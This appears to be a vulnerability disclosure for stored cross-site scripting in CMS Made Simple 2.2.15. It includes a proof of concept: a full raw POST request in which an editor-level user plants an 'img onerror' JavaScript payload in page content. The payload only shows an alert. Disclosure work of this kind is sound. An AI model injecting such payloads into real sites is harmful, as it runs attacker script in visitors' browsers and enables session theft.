Summary:
Stored Cross-Site Scripting - CMS Made Simple 2.2.15
Detailed Description:
#Description
A user has the permission to edit content (Editor or Designer) with javascript
embedded in the content. When any user accesses the page, the javascript code
will execute
#PoC
## Step 1: Go to Content Manager and edit content
## Step 2: Modify content_en with payload "<img src = x onerror = alert
(origin)>" and submit
POST /cmsms/admin/moduleinterface.php HTTP/1.1
Host: web-lab.pwn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web-lab.pwn/
Content-Type: multipart/form-data;
boundary=---------------------------72093799622205927352514468929
Content-Length: 4525
Origin: http://web-lab.pwn
Connection: close
Cookie:
e65594eeb39b9b448034fc3eee48fc815463b91a=9b293e574967f5dc78abea9174d5f4caf5159e14%3A%3AeyJ1aWQiOjMsInVzZXJuYW1lIjoiZWRpdG9yIiwiZWZmX3VpZCI6bnVsbCwiZWZmX3VzZXJuYW1lIjpudWxsLCJoYXNoIjoiJDJ5JDEwJExFM1NKTHF5bDR3emh2cHNcLzgxTVIuVUk4bU9tcEZNekJwUkU4dzc5Z1NlS3c0UGtqbExycSJ9;
__c=1a2e1c5b9a471aa9e58; fusionl9731_visited=yes;
CMSSESSIDac0680acaa0f=al5kq5mhtivpdjlchcutj7g1eo
Upgrade-Insecure-Requests: 1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="mact"
CMSContentManager,m1_,admin_editcontent,0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="__c"
1a2e1c5b9a471aa9e58
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_content_id"
35
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_active_tab"
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_content_type"
content
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="title"
Demo
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="content_en"
<p>demo<img src="x" onerror=alert(origin) /></p>
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="menutext"
Demo
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="parent_id"
-1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="showinmenu"
0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="showinmenu"
1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="titleattribute"
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="accesskey"
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="tabindex"
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="target"
---
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="metadata"
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="pagedata"
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="design_id"
2
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="template_id"
10
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="alias"
demo
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="active"
0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="active"
1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="secure"
0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="cachable"
0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="cachable"
1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="image"
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="thumbnail"
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="extra1"
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="extra2"
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="extra3"
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="wantschildren"
0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="wantschildren"
1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="searchable"
0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="searchable"
1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="disable_wysiwyg"
0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="ownerid"
1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="additional_editors"
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_submit"
Submit
-----------------------------72093799622205927352514468929--
## Step3: Go to page and trigger